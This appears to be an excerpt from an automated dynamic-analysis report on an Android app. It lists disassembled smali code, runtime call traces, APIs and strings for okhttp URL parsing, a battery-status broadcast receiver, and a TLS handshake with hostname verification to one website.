                        388move v3, v12
                        389move v4, v8
                        391invoke-static/range {v1 .. v7}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        392move-result-object v1
                        394invoke-static {v1}, Lokhttp3/internal/HostnamesKt;->toCanonicalHost(Ljava/lang/String;)Ljava/lang/String;
                        • Time: 690650
                          • p0: ?
                          • Return:
                            • anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                        395move-result-object v1
                        396iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        398sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        400iget-object v2, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        402invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        404invoke-virtual {v1, v2}, Lokhttp3/HttpUrl$Companion;->defaultPort(Ljava/lang/String;)I
                        405move-result v1
                        406iput v1, v0, Lokhttp3/HttpUrl$Builder;->port:I
                        407goto_24a:
                        408iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        409if-eqz v1, :cond_250
                        410const/4 v14, 0x1
                        411goto/16 :goto_251
                        412cond_250: const/4 v14, 0x0
                        413goto_251: if-eqz v14, :cond_2b5
                        414move v1, v15
                        415goto_254:
                        416const-string v2, "?#"
                        417move/from16 v14, v19
                        419invoke-static {v13, v2, v1, v14}, Lokhttp3/internal/Util;->delimiterOffset(Ljava/lang/String;Ljava/lang/String;II)I
                        420move-result v2
                        422invoke-direct {v0, v13, v1, v2}, Lokhttp3/HttpUrl$Builder;->resolvePath(Ljava/lang/String;II)V
                        423if-ge v2, v14, :cond_293
                        425invoke-virtual {v13, v2}, Ljava/lang/String;->charAt(I)C
                        426move-result v1
                        427const/16 v3, 0x3f
                        428if-ne v1, v3, :cond_293
                        429const/16 v15, 0x23
                        431invoke-static {v13, v15, v2, v14}, Lokhttp3/internal/Util;->delimiterOffset(Ljava/lang/String;CII)I
                        432move-result v16
                        434sget-object v12, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        436sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        437add-int/lit8 v3, v2, 0x1
                        438const/4 v6, 0x1
                        439const/4 v7, 0x0
                        440const/4 v8, 0x1
                        441const/4 v9, 0x0
                        442const/4 v10, 0x0
                        443const/16 v11, 0xd0
                        444const/16 v17, 0x0
                        446const-string v5, " \"\'<>#"
                        447move-object/from16 v2, p2
                        448move/from16 v4, v16
                        449move-object v15, v12
                        450move-object/from16 v12, v17
                        452invoke-static/range {v1 .. v12}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        453move-result-object v1
                        455invoke-virtual {v15, v1}, Lokhttp3/HttpUrl$Companion;->toQueryNamesAndValues$okhttp(Ljava/lang/String;)Ljava/util/List;
                        456move-result-object v1
                        457iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedQueryNamesAndValues:Ljava/util/List;
                        458move/from16 v2, v16
                        459cond_293: if-ge v2, v14, :cond_2b4
                        461invoke-virtual {v13, v2}, Ljava/lang/String;->charAt(I)C
                        462move-result v1
                        463const/16 v3, 0x23
                        464if-ne v1, v3, :cond_2b4
                        466sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        467add-int/lit8 v3, v2, 0x1
                        468const/4 v6, 0x1
                        469const/4 v7, 0x0
                        470const/4 v8, 0x0
                        471const/4 v9, 0x1
                        472const/4 v10, 0x0
                        473const/16 v11, 0xb0
                        474const/4 v12, 0x0
                        476const-string v5, ""
                        477move-object/from16 v2, p2
                        478move v4, v14
                        480invoke-static/range {v1 .. v12}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        481move-result-object v1
                        482iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedFragment:Ljava/lang/String;
                        483cond_2b4: return-object v0
                        484cond_2b5: new-instance v1, Ljava/lang/StringBuilder;
                        486invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        488const-string v2, "Invalid URL host: \""
                        490invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        492invoke-virtual {v13, v12, v8}, Ljava/lang/String;->substring(II)Ljava/lang/String;
                        493move-result-object v2
                        495invoke-static {v2, v9}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        497invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        499invoke-virtual {v1, v10}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        501invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        502move-result-object v1
                        503new-instance v2, Ljava/lang/IllegalArgumentException;
                        505invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        506move-result-object v1
                        508invoke-direct {v2, v1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        509check-cast v2, Ljava/lang/Throwable;
                        510throw v2
                        511cond_2dc: new-instance v1, Ljava/lang/IllegalArgumentException;
                        513const-string v2, "Expected URL scheme \'http\' or \'https\' but no colon was found"
                        515invoke-direct {v1, v2}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        516check-cast v1, Ljava/lang/Throwable;
                        517goto/16 :goto_2e7
                        518goto_2e6: throw v1
                        519goto_2e7: goto/16 :goto_2e6
                        APIs
                        • android.content.Intent.getExtras
                        • android.os.Bundle.keySet
                        • java.util.Set.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.<init>
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • android.os.Bundle.get
                        • java.lang.String.valueOf
                        • android.content.Intent.putExtra
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.String.split
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.<init>
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.<init>
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Intent.getAction
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • PNBroadcastReceiver.PNBrodcastReceiver$1.this$0:LPNBroadcastReceiver/PNBrodcastReceiver
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • ##
                        • 0
                        • 100
                        • 17303601
                        • 1
                        • 3
                        • battery_low
                        • charge_counter
                        • false
                        • health
                        • icon-small
                        • invalid_charger
                        • level
                        • max_charging_current
                        • max_charging_voltage
                        • plugged
                        • present
                        • scale
                        • seq
                        • status
                        • technology
                        • temperature
                        • voltage
                        • _onreceive
                        • android.intent.action.BATTERY_CHANGED
                        • PNBroadcastReceiver: SUB
                        • _onreceive(Action As String,keys() As String,Data As Object) Not Found!
                        Position Instruction Meta Information
                        1invoke-virtual {p2}, Landroid/content/Intent;->getExtras()Landroid/os/Bundle;
                        • Time: 812244
                          • This:
                            • Intent { act=android.intent.action.BATTERY_CHANGED flg=0x60000010 (has extras) }
                          • Return:
                            • Bundle[mParcelledData.dataSize=560]
                        2move-result-object p1
                        4const-string v0, "##"
                        5if-eqz p1, :cond_4d
                        7invoke-virtual {p1}, Landroid/os/Bundle;->keySet()Ljava/util/Set;
                        8move-result-object v1
                        10invoke-interface {v1}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
                        11move-result-object v1
                        12goto_10:
                        13invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z
                        14move-result v2
                        15if-eqz v2, :cond_4d
                        17invoke-interface {v1}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        18move-result-object v2
                        19check-cast v2, Ljava/lang/String;
                        20if-eqz v2, :cond_10
                        22iget-object v3, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        23new-instance v4, Ljava/lang/StringBuilder;
                        25invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        27iget-object v5, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        29invoke-static {v5}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$000(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        30move-result-object v5
                        32invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36invoke-virtual {v4, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        38invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object v4
                        41invoke-static {v3, v4}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$002(LPNBroadcastReceiver/PNBrodcastReceiver;Ljava/lang/String;)Ljava/lang/String;
                        43iget-object v3, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        45invoke-static {v3}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$100(LPNBroadcastReceiver/PNBrodcastReceiver;)Landroid/content/Intent;
                        46move-result-object v3
                        48invoke-virtual {p1, v2}, Landroid/os/Bundle;->get(Ljava/lang/String;)Ljava/lang/Object;
                        49move-result-object v4
                        51invoke-static {v4}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        52move-result-object v4
                        54invoke-virtual {v3, v2, v4}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
                        • Time: 812246
                          • This:
                            • Intent { (has extras) }
                          • p0: technology
                          • p1: ""
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812248
                          • This:
                            • Intent { (has extras) }
                          • p0: icon-small
                          • p1: 17303601
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812249
                          • This:
                            • Intent { (has extras) }
                          • p0: max_charging_voltage
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812251
                          • This:
                            • Intent { (has extras) }
                          • p0: health
                          • p1: 1
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812252
                          • This:
                            • Intent { (has extras) }
                          • p0: max_charging_current
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812254
                          • This:
                            • Intent { (has extras) }
                          • p0: status
                          • p1: 1
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812255
                          • This:
                            • Intent { (has extras) }
                          • p0: plugged
                          • p1: 1
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812256
                          • This:
                            • Intent { (has extras) }
                          • p0: present
                          • p1: false
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812258
                          • This:
                            • Intent { (has extras) }
                          • p0: seq
                          • p1: 3
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812259
                          • This:
                            • Intent { (has extras) }
                          • p0: charge_counter
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812261
                          • This:
                            • Intent { (has extras) }
                          • p0: level
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812264
                          • This:
                            • Intent { (has extras) }
                          • p0: scale
                          • p1: 100
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812268
                          • This:
                            • Intent { (has extras) }
                          • p0: temperature
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812270
                          • This:
                            • Intent { (has extras) }
                          • p0: voltage
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812271
                          • This:
                            • Intent { (has extras) }
                          • p0: invalid_charger
                          • p1: 0
                          • Return:
                            • Intent { (has extras) }
                        • Time: 812273
                          • This:
                            • Intent { (has extras) }
                          • p0: battery_low
                          • p1: false
                          • Return:
                            • Intent { (has extras) }
                        55goto/16 :goto_10
                        56cond_4d: const/4 p1, 0x1
                        57new-array v1, p1, [Ljava/lang/String;
                        59const-string v2, ""
                        60const/4 v3, 0x0
                        61aput-object v2, v1, v3
                        63iget-object v2, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        65invoke-static {v2}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$000(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        66move-result-object v2
                        67if-eqz v2, :cond_67
                        69iget-object v1, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        71invoke-static {v1}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$000(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        72move-result-object v1
                        74invoke-virtual {v1, v0}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;
                        75move-result-object v1
                        76cond_67:
                        77iget-object v0, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        79invoke-static {v0}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$300(LPNBroadcastReceiver/PNBrodcastReceiver;)Lanywheresoftware/b4a/BA;
                        80move-result-object v0
                        81new-instance v2, Ljava/lang/StringBuilder;
                        83invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        85iget-object v4, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        87invoke-static {v4}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$200(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        88move-result-object v4
                        90invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        92const-string v4, "_onreceive"
                        94invoke-virtual {v2, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        96invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        97move-result-object v2
                        99invoke-virtual {v0, v2}, Lanywheresoftware/b4a/BA;->subExists(Ljava/lang/String;)Z
                        100move-result v0
                        101if-eqz v0, :cond_c0
                        103iget-object v0, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        105invoke-static {v0}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$300(LPNBroadcastReceiver/PNBrodcastReceiver;)Lanywheresoftware/b4a/BA;
                        106move-result-object v0
                        107const/4 v2, 0x0
                        108new-instance v5, Ljava/lang/StringBuilder;
                        110invoke-direct {v5}, Ljava/lang/StringBuilder;-><init>()V
                        112iget-object v6, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        114invoke-static {v6}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$200(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        115move-result-object v6
                        117invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        119invoke-virtual {v5, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        121invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        122move-result-object v4
                        123const/4 v5, 0x3
                        124new-array v5, v5, [Ljava/lang/Object;
                        126invoke-virtual {p2}, Landroid/content/Intent;->getAction()Ljava/lang/String;
                        • Time: 812274
                          • This:
                            • Intent { act=android.intent.action.BATTERY_CHANGED flg=0x60000010 (has extras) }
                          • Return:
                            • android.intent.action.BATTERY_CHANGED
                        127move-result-object p2
                        128aput-object p2, v5, v3
                        129check-cast v1, [Ljava/lang/String;
                        130aput-object v1, v5, p1
                        131const/4 p1, 0x2
                        133iget-object p2, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        135invoke-static {p2}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$100(LPNBroadcastReceiver/PNBrodcastReceiver;)Landroid/content/Intent;
                        136move-result-object p2
                        137aput-object p2, v5, p1
                        139invoke-virtual {v0, v2, v4, v5}, Lanywheresoftware/b4a/BA;->raiseEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/Object;
                        140goto/16 :goto_e4
                        141cond_c0:
                        142iget-object p1, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        144invoke-static {p1}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$300(LPNBroadcastReceiver/PNBrodcastReceiver;)Lanywheresoftware/b4a/BA;
                        145new-instance p1, Ljava/lang/StringBuilder;
                        147invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        149const-string p2, "PNBroadcastReceiver: SUB "
                        151invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        153iget-object p2, p0, LPNBroadcastReceiver/PNBrodcastReceiver$1;->this$0:LPNBroadcastReceiver/PNBrodcastReceiver;
                        155invoke-static {p2}, LPNBroadcastReceiver/PNBrodcastReceiver;->access$200(LPNBroadcastReceiver/PNBrodcastReceiver;)Ljava/lang/String;
                        156move-result-object p2
                        158invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        160const-string p2, "_onreceive(Action As String,keys() As String,Data As Object) Not Found!"
                        162invoke-virtual {p1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        164invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        165move-result-object p1
                        167invoke-static {p1}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        168goto_e4: return-void
                        Cross References
                        APIs
                        • javax.net.ssl.SSLSocketFactory.createSocket
                        • javax.net.ssl.SSLSocket.startHandshake
                        • javax.net.ssl.SSLSocket.getSession
                        • javax.net.ssl.HostnameVerifier.verify
                        • java.util.Collection.isEmpty
                        • java.util.List.get
                        • java.lang.NullPointerException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.security.cert.X509Certificate.getSubjectDN
                        • java.security.Principal.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • javax.net.ssl.SSLPeerUnverifiedException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • javax.net.ssl.SSLPeerUnverifiedException.<init>
                        • okhttp3.Protocol.Companion:Lokhttp3/Protocol$Companion
                        • okhttp3.Protocol.HTTP_1_1:Lokhttp3/Protocol
                        • java.lang.NullPointerException.<init>
                        Strings
                        • ssd-vip.website
                        • sslSocketSession
                        • null cannot be cast to non-null type java.security.cert.X509Certificate
                        • \n |Hostname
                        • not verified:\n | certificate:
                        • \n | DN:
                        • cert.subjectDN
                        • \n | subjectAltNames:
                        • \n
                        • Hostname
                        • not verified (no certificates)
                        • null cannot be cast to non-null type javax.net.ssl.SSLSocket
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6iget-object v0, p0, Lokhttp3/internal/connection/RealConnection;->route:Lokhttp3/Route;
                        8invoke-virtual {v0}, Lokhttp3/Route;->address()Lokhttp3/Address;
                        9move-result-object v0
                        11invoke-virtual {v0}, Lokhttp3/Address;->sslSocketFactory()Ljavax/net/ssl/SSLSocketFactory;
                        12move-result-object v1
                        13const/4 v2, 0x0
                        14move-object v3, v2
                        15check-cast v3, Ljavax/net/ssl/SSLSocket;
                        16try_start_e:
                        17invoke-static {v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        19iget-object v4, p0, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        21invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        22move-result-object v5
                        24invoke-virtual {v5}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        • Time: 698109
                          • This:
                            • https://ssd-vip.website/
                          • Return:
                            • ssd-vip.website
                        25move-result-object v5
                        27invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        28move-result-object v6
                        30invoke-virtual {v6}, Lokhttp3/HttpUrl;->port()I
                        31move-result v6
                        32const/4 v7, 0x1
                        34invoke-virtual {v1, v4, v5, v6, v7}, Ljavax/net/ssl/SSLSocketFactory;->createSocket(Ljava/net/Socket;Ljava/lang/String;IZ)Ljava/net/Socket;
                        35move-result-object v1
                        36if-eqz v1, :cond_193
                        37check-cast v1, Ljavax/net/ssl/SSLSocket;
                        38try_start_2c:
                        39invoke-virtual {p1, v1}, Lokhttp3/internal/connection/ConnectionSpecSelector;->configureSecureSocket(Ljavax/net/ssl/SSLSocket;)Lokhttp3/ConnectionSpec;
                        40move-result-object p1
                        42invoke-virtual {p1}, Lokhttp3/ConnectionSpec;->supportsTlsExtensions()Z
                        • Time: 698922
                          • This:
                            • ConnectionSpec(cipherSuites=[TLS_AES_128_GCM_SHA256, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256, TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA, TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA, TLS_RSA_WITH_AES_128_GCM_SHA256, TLS_RSA_WITH_AES_256_GCM_SHA384, TLS_RSA_WITH_AES_128_CBC_SHA, TLS_RSA_WITH_AES_256_CBC_SHA, SSL_RSA_WITH_3DES_EDE_CBC_SHA], tlsVersions=[TLS_1_3, TLS_1_2], supportsTlsExtensions=true)
                          • Return:
                            • true
                        43move-result v3
                        44if-eqz v3, :cond_4b
                        46sget-object v3, Lokhttp3/internal/platform/Platform;->Companion:Lokhttp3/internal/platform/Platform$Companion;
                        48invoke-virtual {v3}, Lokhttp3/internal/platform/Platform$Companion;->get()Lokhttp3/internal/platform/Platform;
                        49move-result-object v3
                        51invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        52move-result-object v4
                        54invoke-virtual {v4}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        55move-result-object v4
                        57invoke-virtual {v0}, Lokhttp3/Address;->protocols()Ljava/util/List;
                        58move-result-object v5
                        60invoke-virtual {v3, v1, v4, v5}, Lokhttp3/internal/platform/Platform;->configureTlsExtensions(Ljavax/net/ssl/SSLSocket;Ljava/lang/String;Ljava/util/List;)V
                        61cond_4b:
                        62invoke-virtual {v1}, Ljavax/net/ssl/SSLSocket;->startHandshake()V
                        64invoke-virtual {v1}, Ljavax/net/ssl/SSLSocket;->getSession()Ljavax/net/ssl/SSLSession;
                        65move-result-object v3
                        67sget-object v4, Lokhttp3/Handshake;->Companion:Lokhttp3/Handshake$Companion;
                        69const-string v5, "sslSocketSession"
                        71invoke-static {v3, v5}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        73invoke-virtual {v4, v3}, Lokhttp3/Handshake$Companion;->get(Ljavax/net/ssl/SSLSession;)Lokhttp3/Handshake;
                        74move-result-object v4
                        76invoke-virtual {v0}, Lokhttp3/Address;->hostnameVerifier()Ljavax/net/ssl/HostnameVerifier;
                        77move-result-object v5
                        79invoke-static {v5}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        81invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        82move-result-object v6
                        84invoke-virtual {v6}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        85move-result-object v6
                        87invoke-interface {v5, v6, v3}, Ljavax/net/ssl/HostnameVerifier;->verify(Ljava/lang/String;Ljavax/net/ssl/SSLSession;)Z
                        88move-result v3
                        89if-nez v3, :cond_115
                        91invoke-virtual {v4}, Lokhttp3/Handshake;->peerCertificates()Ljava/util/List;
                        92move-result-object p1
                        93move-object v3, p1
                        94check-cast v3, Ljava/util/Collection;
                        96invoke-interface {v3}, Ljava/util/Collection;->isEmpty()Z
                        97move-result v3
                        98xor-int/2addr v3, v7
                        99if-eqz v3, :cond_ef
                        100const/4 v3, 0x0
                        102invoke-interface {p1, v3}, Ljava/util/List;->get(I)Ljava/lang/Object;
                        103move-result-object p1
                        104if-nez p1, :cond_8f
                        105new-instance p1, Ljava/lang/NullPointerException;
                        107const-string v0, "null cannot be cast to non-null type java.security.cert.X509Certificate"
                        109invoke-direct {p1, v0}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        110throw p1
                        111cond_8f: check-cast p1, Ljava/security/cert/X509Certificate;
                        112new-instance v3, Ljavax/net/ssl/SSLPeerUnverifiedException;
                        113new-instance v4, Ljava/lang/StringBuilder;
                        115invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        117const-string v5, "\n |Hostname "
                        119invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        121invoke-virtual {v0}, Lokhttp3/Address;->url()Lokhttp3/HttpUrl;
                        122move-result-object v0
                        124invoke-virtual {v0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        125move-result-object v0
                        127invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        129const-string v0, " not verified:\n | certificate: "
                        131invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        133sget-object v0, Lokhttp3/CertificatePinner;->Companion:Lokhttp3/CertificatePinner$Companion;
                        134move-object v5, p1
                        135check-cast v5, Ljava/security/cert/Certificate;
                        137invoke-virtual {v0, v5}, Lokhttp3/CertificatePinner$Companion;->pin(Ljava/security/cert/Certificate;)Ljava/lang/String;
                        138move-result-object v0
                        140invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        142const-string v0, "\n | DN: "
                        144invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        146invoke-virtual {p1}, Ljava/security/cert/X509Certificate;->getSubjectDN()Ljava/security/Principal;
                        147move-result-object v0
                        149const-string v5, "cert.subjectDN"
                        151invoke-static {v0, v5}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        153invoke-interface {v0}, Ljava/security/Principal;->getName()Ljava/lang/String;
                        154move-result-object v0
